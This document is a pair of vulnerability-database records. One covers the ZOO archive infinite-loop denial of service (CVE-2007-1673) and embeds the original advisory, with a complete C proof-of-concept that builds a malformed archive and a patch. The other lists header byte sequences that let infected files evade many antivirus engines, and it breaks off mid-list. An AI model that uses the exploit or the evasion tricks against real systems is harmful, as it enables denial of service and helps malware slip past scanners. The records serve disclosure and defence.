                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2007-1673",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "VHN-25035",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2007-1673",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-200705-118",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "VULHUB",
                  id: "VHN-25035",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25035",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
         {
            db: "NVD",
            id: "CVE-2007-1673",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. \nA successful attack can exhaust system resources and trigger a denial-of-service condition. \nThis issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. Topic:                  Multiple vendors ZOO file decompression infinite\n                         loop DoS\n\nAnnounced:              2007-05-04\nCredits:                Jean-Sebastien Guay-Leroux\nProducts:               Multiple (see section III)\nImpact:                 DoS (99% CPU utilisation)\nCVE ID:                 CVE-2007-1669, CVE-2007-1670, CVE-2007-1671,\n                         CVE-2007-1672, CVE-2007-1673\n\n\nI.      BACKGROUND\n\nZoo is a compression program and format developed by Rahul Dhesi in the mid\n1980s. The format is based on the LZW compression algorithm and compressed\nfiles are identified by the .zoo file extension. \n\n\nII.  The vulnerability lies in the algorithm used to locate the\nfiles inside the archive.  Each file in a ZOO archive is identified by a\ndirentry structure.  Those structures are linked to one another by a\n'next' pointer.  This pointer is in fact an offset from the beginning of\nthe file, representing the next direntry structure.  If the 'next' offset\npoints back at an already processed direntry, the same file is processed\nmore than once.  The ZOO parser will then enter an infinite loop condition,\nbecause it keeps following the same chain of entries. \n\n\nIII.    AFFECTED SOFTWARE\n\no Barracuda Spam Firewall\no Panda Software Antivirus\no avast! antivirus\no Avira AntiVir\no zoo-2.10\no unzoo.c\no WinAce\no PicoZip\n\n\nIV.     
IMPACT\n\nIf this attack is conducted against a vulnerable antivirus, the host system\nwill have its CPU at 100% utilization and may have problems answering other\nrequests. \n\nIf this attack is conducted against an SMTP content filter running a\nvulnerable ZOO implementation, legitimate clients may be unable to send and\nreceive email through this server. \n\n\nV.      SOLUTION\n\no Barracuda Spam Firewall - CVE-2007-1669:\n   They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and\n   2.0.6399o for firmware < 3.4, March 19th 2007. \n\no Panda Software Antivirus - CVE-2007-1670:\n   They fixed this problem April 2nd 2007. \n\no avast! antivirus - CVE-2007-1672:\n   They fixed this problem in version 4.7.981, April 14th 2007. \n\no Avira AntiVir - CVE-2007-1671:\n   They fixed this problem in avpack32.dll version 7.3.0.6, March 22nd 2007. \n\no zoo-2.10 - CVE-2007-1669:\n   This software is not maintained anymore.  A patch for version 2.10 is\n   provided in section VII of this advisory because some SMTP content\n   filters may still use this software. \n\no unzoo.c - CVE-2007-1673:\n   This software is not maintained anymore.  No patch is provided for this\n   software. \n\no WinAce was contacted but no response was received from them. \n\no PicoZip was contacted but no response was received from them. \n\n\nVI.     PROOF OF CONCEPT\n\nUsing the PIRANA framework version 0.3.3, available at\nhttp://www.guay-leroux.com , it is possible to test your SMTP server\nagainst this vulnerability. \n\nAlternatively, here is an exploit that will create a file that will trigger\nthe infinite loop condition when it is processed. 
\n\n/*\n\nExploit for the vulnerability:\nMultiple vendors ZOO file decompression infinite loop DoS\n\ncoded by Jean-S\\xe9bastien Guay-Leroux\nSeptember 2006\n\n*/\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\n// Structure of a ZOO header\n\n#define ZOO_HEADER_SIZE         0x0000002a\n\n#define ZH_TEXT                 0\n#define ZH_TAG                  20\n#define ZH_START_OFFSET         24\n#define ZH_NEG_START_OFFSET     28\n#define ZH_MAJ_VER              32\n#define ZH_MIN_VER              33\n#define ZH_ARC_HTYPE            34\n#define ZH_ARC_COMMENT          35\n#define ZH_ARC_COMMENT_LENGTH   39\n#define ZH_VERSION_DATA         41\n\n\n#define D_DIRENTRY_LENGTH       56\n\n#define D_TAG                   0\n#define D_TYPE                  4\n#define D_PACKING_METHOD        5\n#define D_NEXT_ENTRY            6\n#define D_OFFSET                10\n#define D_DATE                  14\n#define D_TIME                  16\n#define D_FILE_CRC              18\n#define D_ORIGINAL_SIZE         20\n#define D_SIZE_NOW              24\n#define D_MAJ_VER               28\n#define D_MIN_VER               29\n#define D_DELETED               30\n#define D_FILE_STRUCT           31\n#define D_COMMENT_OFFSET        32\n#define D_COMMENT_SIZE          36\n#define D_FILENAME              38\n#define D_VAR_DIR_LEN           51\n#define D_TIMEZONE              53\n#define D_DIR_CRC               54\n#define D_NAMLEN                ( D_DIRENTRY_LENGTH + 0 )\n#define D_DIRLEN                ( D_DIRENTRY_LENGTH + 1 )\n#define D_LFILENAME             ( D_DIRENTRY_LENGTH + 2 )\n\n\nvoid put_byte (char *ptr, unsigned char data) {\n         *ptr = data;\n}\n\nvoid put_word (char *ptr, unsigned short data) {\n         put_byte (ptr, data);\n         put_byte (ptr + 1, data >> 8);\n}\n\nvoid put_longword (char *ptr, unsigned long data) {\n         put_byte (ptr, data);\n         put_byte (ptr + 1, data >> 8);\n         put_byte (ptr + 2, data >> 16);\n         put_byte 
(ptr + 3, data >> 24);\n}\n\nFILE * open_file (char *filename) {\n\n         FILE *fp;\n\n         fp = fopen ( filename , \"w\" );\n\n         if (!fp) {\n                 perror (\"Cant open file\");\n                 exit (1);\n         }\n\n         return fp;\n}\n\nvoid usage (char *progname) {\n\n         printf (\"\\nTo use:\\n\");\n         printf (\"%s <archive name>\\n\\n\", progname);\n\n         exit (1);\n}\n\nint main (int argc, char *argv[]) {\n         FILE *fp;\n         char *hdr = (char *) malloc (4096);\n         char *filename = (char *) malloc (256);\n         int written_bytes;\n         int total_size;\n\n         if ( argc != 2) {\n                 usage ( argv[0] );\n         }\n\n         strncpy (filename, argv[1], 255);\n\n         if (!hdr || !filename) {\n                 perror (\"Error allocating memory\");\n                 exit (1);\n         }\n\n         memset (hdr, 0x00, 4096);\n\n         // Build a ZOO header\n         memcpy          (hdr + ZH_TEXT, \"ZOO 2.10 Archive.\\032\", 18);\n         put_longword    (hdr + ZH_TAG, 0xfdc4a7dc);\n         put_longword    (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);\n         put_longword    (hdr + ZH_NEG_START_OFFSET,\n             (ZOO_HEADER_SIZE) * -1);\n         put_byte        (hdr + ZH_MAJ_VER, 2);\n         put_byte        (hdr + ZH_MIN_VER, 0);\n         put_byte        (hdr + ZH_ARC_HTYPE, 1);\n         put_longword    (hdr + ZH_ARC_COMMENT, 0);\n         put_word        (hdr + ZH_ARC_COMMENT_LENGTH, 0);\n         put_byte        (hdr + ZH_VERSION_DATA, 3);\n\n         // Build vulnerable direntry struct\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);\n         put_word        (hdr + 
ZOO_HEADER_SIZE + D_DATE, 0x3394);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);\n         put_byte        (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);\n         put_longword    (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);\n         put_word        (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);\n         memcpy          (hdr + ZOO_HEADER_SIZE + D_FILENAME,\n                             \"AAAAAAAA.AAA\", 13);\n\n         total_size = ZOO_HEADER_SIZE + 51;\n\n         fp = open_file (filename);\n\n         if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {\n                 printf (\"The file has been written\\n\");\n         } else {\n                 printf (\"Cant write to the file\\n\");\n                 exit (1);\n         }\n\n         fclose (fp);\n\n         return 0;\n}\n\n\nVII.    PATCH\n\nTo fix this issue, ensure that the offset of the next file to process is\nalways greater than the one you are currently processing.  This will\nguarantee the fact that it's not possible to process the same files over\nand over again.  Here is a patch for the software zoo version 2.10\ndistributed with many UNIX systems:\n\n\ndiff -u zoo/zooext.c zoo-patched/zooext.c\n--- zoo/zooext.c        1991-07-11 15:08:00.000000000 -0400\n+++ zoo-patched/zooext.c        2007-03-16 16:45:28.000000000 -0500\n@@ -89,6 +89,7 @@\n  #endif\n  struct direntry direntry;                 /* directory entry */\n  int first_dir = 1;\n  /* first dir entry seen? 
*/\n+unsigned long zoo_pointer = 0;                     /* Track our position\nin the file */\n\n  static char extract_ver[] = \"Zoo %d.%d is needed to extract %s.\\n\";\n  static char no_space[] = \"Insufficient disk space to extract %s.\\n\";\n@@ -169,6 +170,9 @@\n                 exit_status = 1;\n     }\n     zooseek (zoo_file, zoo_header.zoo_start, 0); /* seek to where data\n     begins */\n+\n+   /* Begin tracking our position in the file */\n+   zoo_pointer = zoo_header.zoo_start;\n  }\n\n  #ifndef PORTABLE\n@@ -597,6 +601,12 @@\n     } /* end if */\n\n  loop_again:\n+\n+   /* Make sure we are not seeking to already processed data */\n+   if (next_ptr <= zoo_pointer)\n+          prterror ('f', \"ZOO chain structure is corrupted\\n\");\n+   zoo_pointer = next_ptr;\n+\n     zooseek (zoo_file, next_ptr, 0); /* ..seek to next dir entry */\n  } /* end while */\n\ndiff -u zoo/zoolist.c zoo-patched/zoolist.c\n--- zoo/zoolist.c       1991-07-11 15:08:04.000000000 -0400\n+++ zoo-patched/zoolist.c       2007-03-16 16:45:20.000000000 -0500\n@@ -92,6 +92,7 @@\n  int show_mode = 0;                             /* show file protection */\n  #endif\n  int first_dir = 1;                             /* if first direntry -- to\n  adjust dat_ofs */\n+unsigned long zoo_pointer = 0;         /* Track our position in the file\n*/\n\n  while (*option) {\n     switch (*option) {\n@@ -211,6 +212,9 @@\n                 show_acmt (&zoo_header, zoo_file, 0);           /* show\n                 archive comment */\n         }\n\n+   /* Begin tracking our position in the file */\n+   zoo_pointer = zoo_header.zoo_start;\n+\n     /* Seek to the beginning of the first directory entry */\n     if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) {\n        ercount++;\n@@ -437,6 +441,11 @@\n           if (verb_list && !fast)\n              show_comment (&direntry, zoo_file, 0, (char *) NULL);\n        } /* end if (lots of conditions) */\n+\n+      /* Make sure we are not seeking to already 
processed data */\n+      if (direntry.next <= zoo_pointer)\n+               prterror ('f', \"ZOO chain structure is corrupted\\n\");\n+      zoo_pointer = direntry.next;\n\n                 /* ..seek to next dir entry */\n        zooseek (zoo_file, direntry.next, 0);\n\n\nVIII.   CREDITS\n\nJean-Sebastien Guay-Leroux found the bug and wrote the exploit for it. \n\n\nIX.     REFERENCES\n\n1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669\n\n2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670\n\n3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671\n\n4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672\n\n5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673\n\n\nX.      HISTORY\n\n2006-09-??  : Vulnerability is found\n2007-03-19  : All vendors notified\n2007-03-19  : Barracuda Networks provided a fix\n2007-03-22  : Avira provided a fix\n2007-04-02  : Panda Antivirus provided a fix\n2007-04-14  : avast! antivirus provided a fix\n2007-05-04  : Public disclosure\n",
      sources: [
         {
            db: "NVD",
            id: "CVE-2007-1673",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "VULHUB",
            id: "VHN-25035",
         },
         {
            db: "PACKETSTORM",
            id: "56479",
         },
      ],
      trust: 2.07,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2007-1673",
            trust: 2.9,
         },
         {
            db: "BID",
            id: "23823",
            trust: 2,
         },
         {
            db: "SECUNIA",
            id: "25315",
            trust: 1.7,
         },
         {
            db: "OSVDB",
            id: "36208",
            trust: 1.7,
         },
         {
            db: "SREASON",
            id: "2680",
            trust: 1.7,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
            trust: 0.8,
         },
         {
            db: "XF",
            id: "34080",
            trust: 0.6,
         },
         {
            db: "BUGTRAQ",
            id: "20070504 MULTIPLE VENDORS ZOO FILE DECOMPRESSION INFINITE LOOP DOS",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-118",
            trust: 0.6,
         },
         {
            db: "VULHUB",
            id: "VHN-25035",
            trust: 0.1,
         },
         {
            db: "PACKETSTORM",
            id: "56479",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25035",
         },
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
         {
            db: "PACKETSTORM",
            id: "56479",
         },
         {
            db: "NVD",
            id: "CVE-2007-1673",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
   },
   id: "VAR-200705-0187",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25035",
         },
      ],
      trust: 0.01,
   },
   last_update_date: "2023-12-18T12:12:33.864000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://amavis.org/",
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-399",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25035",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
         {
            db: "NVD",
            id: "CVE-2007-1673",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.7,
            url: "http://www.securityfocus.com/bid/23823",
         },
         {
            trust: 1.7,
            url: "http://www.amavis.org/security/asa-2007-2.txt",
         },
         {
            trust: 1.7,
            url: "http://osvdb.org/36208",
         },
         {
            trust: 1.7,
            url: "http://secunia.com/advisories/25315",
         },
         {
            trust: 1.7,
            url: "http://securityreason.com/securityalert/2680",
         },
         {
            trust: 1.1,
            url: "http://www.securityfocus.com/archive/1/467646/100/0/threaded",
         },
         {
            trust: 1.1,
            url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080",
         },
         {
            trust: 0.9,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1673",
         },
         {
            trust: 0.8,
            url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-1673",
         },
         {
            trust: 0.6,
            url: "http://www.barracudanetworks.com/ns/products/spam_overview.php",
         },
         {
            trust: 0.6,
            url: "http://xforce.iss.net/xforce/xfdb/34080",
         },
         {
            trust: 0.6,
            url: "http://www.securityfocus.com/archive/1/archive/1/467646/100/0/threaded",
         },
         {
            trust: 0.3,
            url: "http://www.avast.com",
         },
         {
            trust: 0.3,
            url: "http://www.avira.com/",
         },
         {
            trust: 0.3,
            url: "http://www.pandasoftware.com/",
         },
         {
            trust: 0.3,
            url: "http://www.picozip.com/",
         },
         {
            trust: 0.3,
            url: "http://www.winace.com/",
         },
         {
            trust: 0.3,
            url: "/archive/1/467646",
         },
         {
            trust: 0.3,
            url: "http://archives.math.utk.edu/software/multi-platform/gap/util/unzoo.c",
         },
         {
            trust: 0.1,
            url: "http://www.guay-leroux.com",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1671",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1672",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1669",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1670",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25035",
         },
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
         {
            db: "PACKETSTORM",
            id: "56479",
         },
         {
            db: "NVD",
            id: "CVE-2007-1673",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "VULHUB",
            id: "VHN-25035",
         },
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
         {
            db: "PACKETSTORM",
            id: "56479",
         },
         {
            db: "NVD",
            id: "CVE-2007-1673",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2007-05-09T00:00:00",
            db: "VULHUB",
            id: "VHN-25035",
         },
         {
            date: "2007-05-04T00:00:00",
            db: "BID",
            id: "23823",
         },
         {
            date: "2012-06-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
         {
            date: "2007-05-04T16:51:04",
            db: "PACKETSTORM",
            id: "56479",
         },
         {
            date: "2007-05-09T01:19:00",
            db: "NVD",
            id: "CVE-2007-1673",
         },
         {
            date: "2007-05-08T00:00:00",
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2018-10-16T00:00:00",
            db: "VULHUB",
            id: "VHN-25035",
         },
         {
            date: "2016-07-06T14:39:00",
            db: "BID",
            id: "23823",
         },
         {
            date: "2012-06-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
         {
            date: "2018-10-16T16:40:28.443000",
            db: "NVD",
            id: "CVE-2007-1673",
         },
         {
            date: "2007-05-10T00:00:00",
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Denial-of-service (DoS) vulnerability in unzoo.c as used in multiple products including AMaViS",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "resource management error",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
      trust: 0.6,
   },
}

var-201203-0367
Vulnerability from variot

The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations. The RAR file parser in multiple products contains a vulnerability that can prevent malware detection. If it is announced that different RAR parser implementations also have the problem, this vulnerability may be split into multiple CVEs. An attacker may avoid malware detection via a RAR file that starts with an MZ character sequence. Successful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection.
Sophos Anti-Virus is a set of anti-virus software for various operating systems from Sophos, UK. The software detects and removes viruses, spyware, trojans and worms in real time, ensuring comprehensive network protection for desktops and laptops. Multiple file-parsing vulnerabilities lead to detection evasion in different antivirus (AV) products. All affected products are command-line versions of the AVs.

Vulnerability Descriptions

  1. Specially crafted infected POSIX TAR files with "[aliases]" as first 9 bytes evades detection.

Affected products - ClamAV 0.96.4, CAT-QuickHeal 11.00

CVE no - CVE-2012-1419

  1. Specially crafted infected POSIX TAR files with "\7fELF" as first 4 bytes evades detection.

Affected products - CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, Fortinet 4.2.254.0, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, Rising 22.83.00.03

CVE no - CVE-2012-1420

  1. Specially crafted infected POSIX TAR files with "MSCF" as first 4 bytes evades detection.

Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Rising 22.83.00.03, Symantec 20101.3.0.103

CVE no - CVE-2012-1421

  1. Specially crafted infected POSIX TAR files with "ITSF" as first 4 bytes evades detection.

Affected products - CAT-QuickHeal 11.00, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03

CVE no - CVE-2012-1422

  1. Specially crafted infected POSIX TAR files with "MZ" as first 2 bytes evades detection.

Affected products - Command 5.2.11.5, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, Fortinet 4.2.254.0, Ikarus T3.1.1.97.0, K7AntiVirus 9.77.3565, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Rising 22.83.00.03, VirusBuster 13.6.151.0

CVE no - CVE-2012-1423

  1. Specially crafted infected POSIX TAR files with "\19\04\00\10" at offset 8 evades detection.

Affected products - Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Jiangmin 13.0.900, Norman 6.06.12, PCTools 7.0.3.5, Sophos 4.61.0

CVE no - CVE-2012-1424

  1. Specially crafted infected POSIX TAR files with "\50\4B\03\04" as the first 4 bytes evades detection.

Affected products - AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Emsisoft 5.1.0.1, Fortinet 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004

CVE no - CVE-2012-1425

  1. Specially crafted infected POSIX TAR files with "\42\5A\68" as the first 3 bytes evades detection.

Affected products - CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, K7AntiVirus 9.77.3565, Norman 6.06.12, Rising 22.83.00.03

CVE no - CVE-2012-1426

  1. Specially crafted infected POSIX TAR files with "\57\69\6E\5A\69\70" at offset 29 evades detection.

Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0

CVE no - CVE-2012-1427

  1. Specially crafted infected POSIX TAR files with "\4a\46\49\46" at offset 6 evades detection.

Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0

CVE no - CVE-2012-1428

  1. Specially crafted infected ELF files with "ustar" at offset 257 evades detection.

Affected products - BitDefender 7.2, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Secure 9.0.16160.0, Ikarus T3.1.1.97.0, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01

CVE no - CVE-2012-1429

  12. Specially crafted infected ELF files with "\19\04\00\10" at offset 8 evades detection.

Affected products - BitDefender 7.2, Comodo 7424, eSafe 7.0.17.0, F-Secure 9.0.16160.0, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03

CVE no - CVE-2012-1430

  13. Specially crafted infected ELF files with "\4a\46\49\46" at offset 6 evades detection.

Affected products - BitDefender 7.2, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03

CVE no - CVE-2012-1431

  1. Specially crafted infected MS EXE files with "\57\69\6E\5A\69\70" at offset 29 evades detection.

Affected products - Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1432

  1. Specially crafted infected MS EXE files with "\4a\46\49\46" at offset 6 evades detection.

Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1433

  1. Specially crafted infected MS EXE files with "\19\04\00\10" at offset 8 evades detection.

Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1434

  1. Specially crafted infected MS EXE files with "\50\4B\4C\49\54\45" at offset 30 evades detection.

Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1435

  1. Specially crafted infected MS EXE files with "\2D\6C\68" at offset 2 evades detection.

